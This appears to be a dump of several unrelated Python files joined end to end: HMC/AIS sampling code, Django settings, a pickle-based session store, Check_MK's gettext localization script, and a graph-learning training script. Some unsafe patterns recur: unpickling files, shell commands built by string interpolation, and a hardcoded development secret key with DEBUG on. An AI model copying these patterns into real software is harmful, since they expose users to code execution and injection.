        grad = torchgrad(-log_f_i(z, batch, t1), z, grad_outputs=grad_outputs,retain_graph=False, create_graph=False)[0]
        # clip by norm
        # NOTE(review): torch.clamp clips element-wise by value, not by norm,
        # and with this huge bound it is effectively a no-op — confirm intent.
        max_ = B * model_latent_dim * 100.
        grad = torch.clamp(grad, -max_, max_)
        # grad.requires_grad_()
        return grad.detach()

      def normalized_kinetic(v):
        # Standard-normal kinetic energy for HMC.
        zeros = torch.zeros(B, model_latent_dim).cuda()
        return -utils.log_normal(v, zeros, zeros).detach()

      z, v = hmc.hmc_trajectory(current_z, current_v, U, grad_U, epsilon)
      # import ipdb; ipdb.set_trace()
      current_z, epsilon, accept_hist = hmc.accept_reject(
          current_z, current_v,
          z, v,
          epsilon,
          accept_hist, j,
          U, K=normalized_kinetic)
      # Running AIS estimate for the progress bar.
      tmp = utils.log_mean_exp(logw.view(n_sample, -1).transpose(0, 1)).mean().item()
      pbar.set_postfix_str(s=f'AIS: {tmp:.2f}', refresh=True)
      if j % 10 == 1:
        with torch.no_grad():
          x = model_decode_vector(z)
          # Assumes square images flattened to x.size(1) — TODO confirm.
          h = w = int(np.sqrt(x.size(1)))
          # Plot current reconstructions next to the data batch.
          def _plot(ims):
            c, h, w = ims.shape[-3:]
            grid = vutils.make_grid(ims.reshape(-1, c,h,w), nrow=8, padding=2, normalize=True)
            plt.imshow(np.transpose(grid.numpy(), (1,2,0)))
            plt.tight_layout()
            plt.grid()
            plt.xticks([])
            plt.yticks([])
          f, axs = plt.subplots(1, 2, figsize=(8,5))
          plt.subplot(axs[0])
          _plot(x.view(x.size(0),1,h, w)[:64].cpu())
          plt.subplot(axs[1])
          _plot(batch.view(x.size(0),1,h, w)[:64].cpu())
          plt.savefig(os.path.join(save_dir,f'{j}.jpeg'), bbox_inches='tight', pad_inches=0, format='jpeg')
    # Log-mean-exp over the n_sample importance samples per datapoint.
    logw = utils.log_mean_exp(logw.view(n_sample, -1).transpose(0, 1))
    if not forward:
      # Sign flip for the reverse chain (BDMC convention).
      logw = -logw
    logws.append(logw.data.detach().cpu().numpy())
    print('Last batch stats %.4f' % (logw.mean().cpu().data.numpy()))
    # model.zero_grad()
    # del log_int_1
    # del log_int_2
    # del logw
  return logws
|
import os
from urllib.parse import urlparse
import dj_database_url
# Project root: two directory levels above this settings file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Development-only fallback; production deployments must provide
# DJANGO_SECRET_KEY in the environment (setdefault keeps an existing value).
SECRET_KEY = 'insecure-development-key-change-me'
SECRET_KEY = os.environ.setdefault("DJANGO_SECRET_KEY", SECRET_KEY)
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Hosts allowed to serve the site; must be populated when DEBUG is False.
ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.sites',
    'pipeline',  # django-pipeline asset compilation/packaging
    'clear_cache',  # management command to clear the cache
    'topics',  # project app
)
# Middleware order matters in Django: requests pass top-to-bottom,
# responses bottom-to-top.
MIDDLEWARE = (
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',  # static files serving
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.gzip.GZipMiddleware',
)
ROOT_URLCONF = 'codebook.urls'

# django.contrib.sites expects SITE_ID to be an integer primary key;
# environment variables are strings, so convert explicitly.
if os.getenv("SITE_ID"):
    SITE_ID = int(os.getenv("SITE_ID"))
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'APP_DIRS': True,  # look up templates in each app's templates/ dir
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'topics.settings_context.settings_context'  # exposes settings to templates
            ],
        },
    },
]

WSGI_APPLICATION = 'codebook.wsgi.application'

# Use DATABASE_URL (e.g. on Heroku) when present, else a local SQLite file.
if os.getenv("DATABASE_URL"):
    DATABASES = {'default': dj_database_url.config()}
else:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        }
    }

# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
USE_ETAGS = True
APPEND_SLASH = True
# Logging: everything from the 'django' logger goes to the console;
# level is overridable via the DJANGO_LOG_LEVEL environment variable.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['console'],
            'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
        },
    },
}

# Cache: Redis when REDIS_URL is configured, otherwise a no-op dummy cache.
if os.environ.get('REDIS_URL'):
    redis_url = urlparse(os.environ.get('REDIS_URL'))
    CACHES = {
        'default': {
            'BACKEND': 'redis_cache.RedisCache',
            'LOCATION': '{}:{}'.format(redis_url.hostname, redis_url.port),
            'OPTIONS': {
                'PASSWORD': redis_url.password,
                'DB': 0,
            }
        }
    }
else:
    CACHES = {
        'default': {
            'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        }
    }
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/_static/'
STATIC_ROOT = 'static'
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    'pipeline.finders.PipelineFinder',
)
STATICFILES_STORAGE = 'pipeline.storage.PipelineManifestStorage'
# Don't raise when a referenced file is missing from the manifest.
WHITENOISE_MANIFEST_STRICT = False

# django-pipeline: compile SCSS/CoffeeScript; no minification (Noop compressors).
PIPELINE = {
    'STYLESHEETS': {
        'style': {
            'source_filenames': (
                'css/main.scss',
            ),
            'output_filename': 'css/style.css',
        }
    },
    'JAVASCRIPT': {
        'script': {
            'source_filenames': (
                'js/edit_page.coffee',
                'js/tab_ajax.coffee',
                'js/tag_hotkeys.coffee',
            ),
            'output_filename': 'js/script.js',
        },
    },
    'COMPILERS': (
        'pipeline.compilers.sass.SASSCompiler',
        'pipeline.compilers.coffee.CoffeeScriptCompiler'
    ),
    "SASS_BINARY": 'pysassc',
    "COFFEE_SCRIPT_BINARY": 'npx coffee',
    'DISABLE_WRAPPER': True,
    'CSS_COMPRESSOR': 'pipeline.compressors.NoopCompressor',
    'JS_COMPRESSOR': 'pipeline.compressors.NoopCompressor'
}

LOGIN_REDIRECT_URL = '/'
LOGIN_URL = 'topics:login'
# Development email backend: print emails to the console.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
# -*- coding: utf-8 -*-
"""
This module have serializing methods for data persistence so to let the package "save" custom objects
session module made by Davtoh and powered by dill
Dependency project: https://github.com/uqfoundation/dill
"""
try:
    # for security reasons read this: http://www.benfrederickson.com/dont-pickle-your-data/
    # download: https://pypi.python.org/pypi/dill#downloads
    # see print dill.license() https://github.com/uqfoundation
    # import jsonpickle as serializer # http://jsonpickle.github.io/
    # import dill as serializer # dill must be >= 0.2.4
    # dill.detect.trace(True)
    # Python 2's C-accelerated pickle is spelled cPickle ("cpickle" does not
    # exist, so the original always fell through to plain pickle).
    import cPickle as serializer
    #__license__ = serializer.__license__
except ImportError:
    # Python 3: pickle is already C-accelerated.
    import pickle as serializer
import types
import os
from .root import secure_open
# Values of these types are never persisted (functions, modules, None, and
# classes/metaclasses). The original list contained `type` twice; the
# duplicate is removed — membership tests are unaffected.
__excludeType = [types.FunctionType, types.ModuleType, type(None), type]
# Explicit variable names to skip when building a session.
__excludeVar = []
# Name prefixes to skip (dunder/private names).
__excludePattern = ['__']
def getEnviromentSession(enviroment=None):
    """
    Gets the filtered session from a variable environment.

    :param enviroment: mapping of names to values (defaults to this
        module's globals()).
    :return: dictionary containing the filtered session.
    """
    env = enviroment or globals()
    session = {}
    for name in list(env.keys()):
        # skip names matching an excluded prefix (e.g. dunder names)
        if __excludePattern and name.startswith(*__excludePattern):
            continue
        value = env[name]
        # skip excluded types (functions, modules, ...) and blacklisted names
        if type(value) in __excludeType or name in __excludeVar:
            continue
        session[name] = value
    return session
def saveSession(filepath, session, helper=None):
    """
    Saves dictionary session to file.

    :param filepath: path to save session file.
    :param session: dictionary
    :param helper: optional function applied to the session before saving
    :return: filename of saved session
    """
    # secure_open creates the file safely
    # (see http://stackoverflow.com/a/5624691/5288758)
    with secure_open(filepath, 'wb') as fileobj:
        payload = helper(session) if helper else session
        serializer.dump(payload, fileobj, serializer.HIGHEST_PROTOCOL)
    return fileobj.name
def readSession(filepath, helper=None):
    """
    Loads a dictionary session from file.

    :param filepath: path to load session file.
    :param helper: optional function applied to the loaded session
    :return: session
    """
    with secure_open(filepath, 'rb') as fileobj:
        loaded = serializer.load(fileobj)  # deserialize the stored session
        return helper(loaded) if helper else loaded
def updateSession(filepath, session, replace=True, rdhelper=None, svhelper=None):
    """
    Updates a dictionary session in file.

    :param filepath: path to session file.
    :param session: dictionary.
    :param replace: if True key values are replaced else old key values are kept.
    :param rdhelper: read helper.
    :param svhelper: save helper.
    :return: None
    """
    stored = readSession(filepath, rdhelper)
    if replace:
        # new values win over stored ones
        stored.update(session)
    else:
        # keep existing values; only add keys that are missing
        for key, value in session.items():
            stored.setdefault(key, value)
    saveSession(filepath, stored, svhelper)  # save updated session
def flushSession(filepath):
    """
    Empty session in file.

    :param filepath: path to session file.
    :return: None
    """
    # read first so a missing or corrupt file raises before being overwritten
    readSession(filepath)
    saveSession(filepath, {})  # overwrite with an empty session
def checkFromSession(filepath, varlist):
    """
    Check that variables exist in the session file.

    :param filepath: path to session file.
    :param varlist: list of variable names to check.
    :return: list of booleans, one per requested name.
    """
    stored = readSession(filepath)
    return [name in stored for name in varlist]
def deleteFromSession(filepath, varlist):
    """
    Delete variables from session file.

    :param filepath: path to session file.
    :param varlist: list of variable names to delete.
    :return: None
    """
    stored = readSession(filepath)
    for name in varlist:
        # raises KeyError when the name is absent, same as `del`
        stored.pop(name)
    saveSession(filepath, stored)  # save updated session
|
<gh_stars>0
#!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2014 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import sys, getopt, os, datetime
class LocalizeException(Exception):
    """Error raised for user-facing localization failures.

    Carries a plain-text reason which is also the string representation.
    """

    def __init__(self, reason):
        self.reason = reason

    def __str__(self):
        return self.reason
def verbose_system(command):
    """Run *command* via os.system, announcing it first when opt_verbose is set.

    Returns the os.system exit status (0 on success).
    NOTE(review): opt_verbose is expected to be defined elsewhere in the
    including script — confirm.
    """
    if opt_verbose:
        sys.stdout.write("Running %s...\n" % command)
    return os.system(command)
# gettext text domain of the Multisite GUI.
domain = 'multisite'
# Per-language file paths; filled in later by init_files().
pot_file = None
po_file = None
mo_file = None
alias_file = None
# Prefer the site-local locale hierarchy when one is configured.
# NOTE(review): local_locale_dir / locale_dir are expected to be defined by
# the including script before this point — confirm.
if local_locale_dir:
    locale_base = local_locale_dir
else:
    locale_base = locale_dir
# Use a locally maintained .pot template when it exists.
if local_locale_dir and os.path.exists(local_locale_dir + '/multisite.pot'):
    pot_file = local_locale_dir + '/multisite.pot'
else:
    pot_file = locale_base + '/multisite.pot'
try:
    os.makedirs(locale_base)
except:
    # base directory may already exist
    pass
def localize_usage(err = ''):
    """Print the help text for 'check_mk --localize'.

    The *err* parameter is accepted but unused (kept for call compatibility).
    """
    sys.stdout.write("""Usage: check_mk [-v] --localize COMMAND [ARGS]
Available commands are:
update LANG [ALIAS] ... Creates or updates a .po file for the given
language. The alias is an optional attribute
which will be used as display string in the
Multisite GUI.
compile LANG ... Compiles the .po file into a .mo file which can
be used by gettext.
edit LANG ... Call update, open .po in editor and compile in one step
The regular process for translating is:
1.) Create/update the .po file for the given language
2.) Edit the .po file
3.) Compile the .po file to get a .mo file which can be used by gettext
Locale files are located in: %s
""" % locale_base)
def do_localize(args):
    """Dispatch 'check_mk --localize COMMAND [LANG [ALIAS]]'.

    Exits with status 1 on usage errors or LocalizeException failures.
    """
    if len(args) == 0:
        localize_usage()
        sys.exit(1)
    command = args[0]
    # Optional positional arguments: language code and display alias.
    if len(args) > 1:
        lang = args[1]
    else:
        lang = None
    alias = None
    if len(args) > 2:
        alias = args[2]
    commands = {
        "update" : localize_update,
        "compile" : localize_compile,
        "edit" : localize_edit,
    }
    f = commands.get(command)
    if f:
        check_binaries()
        try:
            f(lang)
            write_alias(alias)
        except LocalizeException, e:  # Python 2 except syntax
            sys.stderr.write("%s\n" % e)
            sys.exit(1)
    else:
        # Unknown command: list the valid ones (highlighted) and bail out.
        allc = commands.keys()
        allc.sort()
        allc = [ tty_bold + c + tty_normal for c in allc ]
        sys.stderr.write("Invalid localize command. Allowed are: %s and %s.\n" %
                         (", ".join(allc[:-1]), allc[-1]))
        sys.exit(1)
def write_alias(alias):
    """Store the language's display alias; '-' removes the alias file."""
    if not alias:
        return
    if alias == '-':
        os.remove(alias_file)
    else:
        # file() is the Python 2 builtin alias of open().
        file(alias_file, 'w').write(alias)
def check_binaries():
    """Raise LocalizeException unless the gettext tool-chain is in PATH."""
    for tool in ('xgettext', 'msgmerge', 'msgfmt'):
        # `which` exits non-zero when the binary is missing
        if os.system('which %s >/dev/null 2>&1' % tool):
            raise LocalizeException('%s binary not found in PATH\n' % tool)
def get_languages():
    """List languages that have a directory below the locale base."""
    entries = os.listdir(locale_base)
    return [entry for entry in entries
            if os.path.isdir(locale_base + '/' + entry)]
def init_files(lang):
    """Point the module-global locale file paths at *lang*'s files."""
    global po_file, mo_file, alias_file
    lc_messages = locale_base + '/%s/LC_MESSAGES' % lang
    po_file = lc_messages + '/%s.po' % domain
    mo_file = lc_messages + '/%s.mo' % domain
    alias_file = locale_base + '/%s/alias' % (lang)
def localize_update_po():
    """Merge the current .pot template into the language's .po file."""
    if opt_verbose:
        sys.stdout.write("Merging translations...")
    returncode = verbose_system('msgmerge -U %s %s >/dev/null' % (po_file, pot_file))
    if returncode != 0:
        sys.stderr.write('Failed!\n')
    else:
        sys.stdout.write('Success! Output: %s\n' % po_file)
def localize_init_po(lang):
    """Create an initial .po file for *lang* from the .pot template."""
    command = 'msginit -i %s --no-translator -l %s -o %s >/dev/null' % (
        pot_file, lang, po_file)
    if verbose_system(command) != 0:
        sys.stderr.write('Failed!\n')
# Dig into the source code and generate a new .pot file
def localize_sniff():
    """Extract translatable strings with xgettext and prepend the file header."""
    sys.stdout.write('Sniffing source code...\n')
    paths = [ default_config_dir, web_dir ]
    if local_web_dir and os.path.exists(local_web_dir):
        paths.append(local_web_dir)
    # Scan all .py and .mk files below the given paths.
    if verbose_system('xgettext --no-wrap --sort-output --force-po '
                      '-L Python --from-code=utf-8 --omit-header '
                      '-o %s $(find %s -type f -name \*.py -o -name \*.mk | xargs) >/dev/null' % \
                      (pot_file, ' '.join(paths))) != 0:
        sys.stderr.write('Failed!\n')
    else:
        # xgettext ran with --omit-header; write our own license/meta header.
        header = '''# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2010 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
msgid ""
msgstr ""
"Project-Id-Version: Check_MK Multisite translation 0.1\\n"
"Report-Msgid-Bugs-To: <EMAIL>\\n"
"POT-Creation-Date: 2011-05-13 09:42+0200\\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n"
"Last-Translator: <NAME> <EMAIL@ADDRESS>\\n"
"Language-Team: LANGUAGE <<EMAIL>>\\n"
"Language: LANGUAGE \\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=utf-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
'''
        f = open(pot_file).read()
        open(pot_file, 'w').write(header + f)
        sys.stdout.write('Success! Output: %s\n' % pot_file)
def localize_edit(lang):
    """Update the .po file, open it in the user's editor, then compile it."""
    localize_update(lang)
    # Honor $VISUAL, then $EDITOR, then fall back to vi.
    editor = os.getenv("VISUAL", os.getenv("EDITOR", "/usr/bin/vi"))
    if not os.path.exists(editor):
        editor = 'vi'
    if verbose_system("%s '%s'" % (editor, po_file)) == 0:
        localize_compile(lang)
    else:
        sys.stderr.write("Aborted.\n")
# Start translating in a new language
def localize_update(lang):
    """Create or refresh the .po file for *lang* from freshly sniffed sources."""
    if not lang:
        raise LocalizeException('No language given')
    init_files(lang)
    try:
        os.makedirs(os.path.dirname(po_file))
    except:
        # directory may already exist (Python 2 has no exist_ok)
        pass
    # Maybe initialize the file in the local hierarchy with the file in
    # the default hierarchy
    if local_locale_dir and not os.path.exists(po_file) \
        and os.path.exists(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)):
        # file() is the Python 2 builtin alias of open().
        file(po_file, 'w').write(file(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)).read())
        sys.stdout.write('Initialize %s with the file in the default hierarchy\n' % po_file)
    localize_sniff()
    if not os.path.exists(po_file):
        sys.stdout.write('Initializing .po file for language %s...\n' % lang)
        localize_init_po(lang)
    else:
        sys.stdout.write('Updating .po file for language %s...\n' % lang)
        localize_update_po()
# Create a .mo file from the given .po file
def localize_compile(lang):
    """Compile *lang*'s .po file into the .mo file used by gettext."""
    if not lang:
        raise LocalizeException('No language given')
    if lang not in get_languages():
        raise LocalizeException('Invalid language given. Available: %s' % ' '.join(get_languages()))
    init_files(lang)
    # Maybe initialize the file in the local hierarchy with the file in
    # the default hierarchy
    if local_locale_dir and not os.path.exists(po_file) \
        and os.path.exists(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)):
        # file() is the Python 2 builtin alias of open().
        file(po_file, 'w').write(file(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)).read())
        sys.stdout.write('Initialize %s with the file in the default hierarchy\n' % po_file)
    if not os.path.exists(po_file):
        raise LocalizeException('The .po file %s does not exist.' % po_file)
    if verbose_system('msgfmt %s -o %s' % (po_file, mo_file)) != 0:
        sys.stderr.write('Failed!\n')
    else:
        sys.stdout.write('Success! Output: %s\n' % mo_file)
|
# -*- coding: utf-8 -*-
import numpy as np
import scipy.sparse as sp
import torch
import random
import argparse
import os
import warnings
warnings.filterwarnings("ignore")
from utils import process
from utils import aug
from modules.gcn import GCNLayer
from net.merit import MERIT
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
def str_to_bool(value):
    """Parse a CLI flag into a bool; accepts common true/false spellings."""
    if isinstance(value, bool):
        return value
    lowered = value.lower()
    if lowered in {'true', 't', '1', 'yes', 'y'}:
        return True
    if lowered in {'false', 'f', '0', 'no', 'n'}:
        return False
    raise ValueError(f'{value} is not a valid boolean value')
# Command-line configuration for MERIT training/evaluation.
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default='cuda:0')
parser.add_argument('--seed', type=int, default=2021)
parser.add_argument('--data', type=str, default='citeseer')
parser.add_argument('--runs', type=int, default=1)
parser.add_argument('--eval_every', type=int, default=10)
parser.add_argument('--epochs', type=int, default=500)
parser.add_argument('--lr', type=float, default=3e-4)
parser.add_argument('--weight_decay', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=4)
parser.add_argument('--sample_size', type=int, default=2000)
parser.add_argument('--patience', type=int, default=100)
# argparse's type=bool is broken for flags; str_to_bool parses the text.
parser.add_argument('--sparse', type=str_to_bool, default=True)
# 3703 presumably matches citeseer's feature dimension (the --data default).
parser.add_argument('--input_dim', type=int, default=3703)
parser.add_argument('--gnn_dim', type=int, default=512)
parser.add_argument('--proj_dim', type=int, default=512)
parser.add_argument('--proj_hid', type=int, default=4096)
parser.add_argument('--pred_dim', type=int, default=512)
parser.add_argument('--pred_hid', type=int, default=4096)
parser.add_argument('--momentum', type=float, default=0.8)
parser.add_argument('--beta', type=float, default=0.6)
parser.add_argument('--alpha', type=float, default=0.05)
parser.add_argument('--drop_edge', type=float, default=0.4)
parser.add_argument('--drop_feat1', type=float, default=0.4)
parser.add_argument('--drop_feat2', type=float, default=0.4)
args = parser.parse_args()
# Keep CPU thread usage bounded.
torch.set_num_threads(4)
def evaluation(adj, diff, feat, gnn, idx_train, idx_test, sparse):
    """Linear-probe evaluation of the (frozen) trained GNN encoder.

    Copies the trained weights into a fresh 1-layer GCN, embeds the graph
    under both the adjacency and the diffusion view, fuses the two
    embeddings by summation, and fits a logistic-regression classifier on
    the train split.

    NOTE(review): relies on module-level globals `input_size`,
    `gnn_output_size` and `labels` defined in the __main__ block below.
    :returns: test-set accuracy (float)
    """
    clf = LogisticRegression(random_state=0, max_iter=2000)
    model = GCNLayer(input_size, gnn_output_size)  # 1-layer
    model.load_state_dict(gnn.state_dict())  # copy trained weights; eval is gradient-free
    with torch.no_grad():
        embeds1 = model(feat, adj, sparse)
        embeds2 = model(feat, diff, sparse)
    # index [0, ...] drops the batch dimension; the two views are fused by sum
    train_embs = embeds1[0, idx_train] + embeds2[0, idx_train]
    test_embs = embeds1[0, idx_test] + embeds2[0, idx_test]
    train_labels = torch.argmax(labels[0, idx_train], dim=1)  # one-hot -> class index
    test_labels = torch.argmax(labels[0, idx_test], dim=1)
    clf.fit(train_embs, train_labels)
    pred_test_labels = clf.predict(test_embs)
    return accuracy_score(test_labels, pred_test_labels)
if __name__ == '__main__':
    # --- reproducibility -----------------------------------------------------
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    torch.cuda.manual_seed(args.seed)
    device = torch.device(args.device if torch.cuda.is_available() else 'cpu')

    # --- unpack hyper-parameters --------------------------------------------
    n_runs = args.runs
    eval_every_epoch = args.eval_every
    dataset = args.data
    input_size = args.input_dim
    gnn_output_size = args.gnn_dim
    projection_size = args.proj_dim
    projection_hidden_size = args.proj_hid
    prediction_size = args.pred_dim
    prediction_hidden_size = args.pred_hid
    momentum = args.momentum
    beta = args.beta
    alpha = args.alpha
    drop_edge_rate_1 = args.drop_edge
    drop_feature_rate_1 = args.drop_feat1
    drop_feature_rate_2 = args.drop_feat2
    epochs = args.epochs
    lr = args.lr
    weight_decay = args.weight_decay
    sample_size = args.sample_size
    batch_size = args.batch_size
    patience = args.patience
    sparse = args.sparse

    # --- load dataset and (cached) diffusion matrix -------------------------
    adj, features, labels, idx_train, idx_val, idx_test = process.load_data(dataset)
    idx_train = torch.LongTensor(idx_train)
    idx_val = torch.LongTensor(idx_val)
    idx_test = torch.LongTensor(idx_test)

    # graph diffusion is expensive: cache it per (dataset, alpha)
    if os.path.exists('data/diff_{}_{}.npy'.format(dataset, alpha)):
        diff = np.load('data/diff_{}_{}.npy'.format(dataset, alpha), allow_pickle=True)
    else:
        diff = aug.gdc(adj, alpha=alpha, eps=0.0001)
        np.save('data/diff_{}_{}'.format(dataset, alpha), diff)

    features, _ = process.preprocess_features(features)
    nb_nodes = features.shape[0]
    ft_size = features.shape[1]
    nb_classes = labels.shape[1]
    features = torch.FloatTensor(features[np.newaxis])  # add batch dim -> (1, N, F)
    labels = torch.FloatTensor(labels[np.newaxis])

    # full-graph normalised views, used only by evaluation()
    norm_adj = process.normalize_adj(adj + sp.eye(adj.shape[0]))
    norm_diff = sp.csr_matrix(diff)
    if sparse:
        eval_adj = process.sparse_mx_to_torch_sparse_tensor(norm_adj)
        eval_diff = process.sparse_mx_to_torch_sparse_tensor(norm_diff)
    else:
        eval_adj = (norm_adj + sp.eye(norm_adj.shape[0])).todense()
        eval_diff = (norm_diff + sp.eye(norm_diff.shape[0])).todense()
        eval_adj = torch.FloatTensor(eval_adj[np.newaxis])
        eval_diff = torch.FloatTensor(eval_diff[np.newaxis])

    result_over_runs = []

    # --- initiate models ------------------------------------------------------
    model = GCNLayer(input_size, gnn_output_size)
    merit = MERIT(gnn=model,
                  feat_size=input_size,
                  projection_size=projection_size,
                  projection_hidden_size=projection_hidden_size,
                  prediction_size=prediction_size,
                  prediction_hidden_size=prediction_hidden_size,
                  moving_average_decay=momentum, beta=beta).to(device)
    opt = torch.optim.Adam(merit.parameters(), lr=lr, weight_decay=weight_decay)

    results = []

    # --- training -------------------------------------------------------------
    best = 0
    patience_count = 0
    for epoch in range(epochs):
        for _ in range(batch_size):
            # sample a contiguous block of `sample_size` nodes as the subgraph
            idx = np.random.randint(0, adj.shape[-1] - sample_size + 1)
            ba = adj[idx: idx + sample_size, idx: idx + sample_size]
            bd = diff[idx: idx + sample_size, idx: idx + sample_size]
            bd = sp.csr_matrix(np.matrix(bd))
            # NOTE(review): this re-assigns the module-level `features` each
            # step; after the first step squeeze(0) is a no-op, but
            # evaluation() then receives the squeezed (N, F) tensor — confirm
            features = features.squeeze(0)
            bf = features[idx: idx + sample_size]
            # view 1: random edge dropping; view 2: graph diffusion
            aug_adj1 = aug.aug_random_edge(ba, drop_percent=drop_edge_rate_1)
            aug_adj2 = bd
            aug_features1 = aug.aug_feature_dropout(bf, drop_percent=drop_feature_rate_1)
            aug_features2 = aug.aug_feature_dropout(bf, drop_percent=drop_feature_rate_2)
            aug_adj1 = process.normalize_adj(aug_adj1 + sp.eye(aug_adj1.shape[0]))
            aug_adj2 = process.normalize_adj(aug_adj2 + sp.eye(aug_adj2.shape[0]))
            if sparse:
                adj_1 = process.sparse_mx_to_torch_sparse_tensor(aug_adj1).to(device)
                adj_2 = process.sparse_mx_to_torch_sparse_tensor(aug_adj2).to(device)
            else:
                aug_adj1 = (aug_adj1 + sp.eye(aug_adj1.shape[0])).todense()
                aug_adj2 = (aug_adj2 + sp.eye(aug_adj2.shape[0])).todense()
                adj_1 = torch.FloatTensor(aug_adj1[np.newaxis]).to(device)
                adj_2 = torch.FloatTensor(aug_adj2[np.newaxis]).to(device)
            aug_features1 = aug_features1.to(device)
            aug_features2 = aug_features2.to(device)
            # one gradient step on the contrastive loss, then update the
            # momentum (EMA) target network
            opt.zero_grad()
            loss = merit(adj_1, adj_2, aug_features1, aug_features2, sparse)
            loss.backward()
            opt.step()
            merit.update_ma()
        # periodic linear-probe evaluation with early stopping
        if epoch % eval_every_epoch == 0:
            acc = evaluation(eval_adj, eval_diff, features, model, idx_train, idx_test, sparse)
            if acc > best:
                best = acc
                patience_count = 0
            else:
                patience_count += 1
            results.append(acc)
            print('\t epoch {:03d} | loss {:.5f} | clf test acc {:.5f}'.format(epoch, loss.item(), acc))
            if patience_count >= patience:
                print('Early Stopping.')
                break
    result_over_runs.append(max(results))
    print('\t best acc {:.5f}'.format(max(results)))
import logging
logging.debug("loading pyami.py")
import sys
import os
import re
import glob
import lxml.etree as etree
import pprint
import ast
from collections import Counter
import traceback
from pathlib import Path
#from cmd_runner import CommandRunner
from dict_lib import AmiDictionary
from file_lib import FileLib
from xml_lib import XmlLib
from text_lib import TextUtil, DSLParser
from pdfreader import PdfReader
# from pdfminer import PDFSyntaxError
from symbol import SymbolIni
from util import AmiLogger
from wikimedia import WikidataLookup
class PyAMI:
    """Command-line driver for the pyami toolkit.

    Parses the commandline, resolves ${symbol} references via SymbolIni,
    then runs the file workflow (glob / split / apply / filter / combine /
    output / assert) over a project directory.
    """

    OUTFILE = "outfile"
    # flags
    APPLY = "apply"
    ASSERT = "assert"
    CHECK_URLS = "check_urls"
    DELETE = "delete"
    COMBINE = "combine"
    CONTAINS = "contains"
    DEBUG = "debug"
    DICTIONARY = "dictionary"
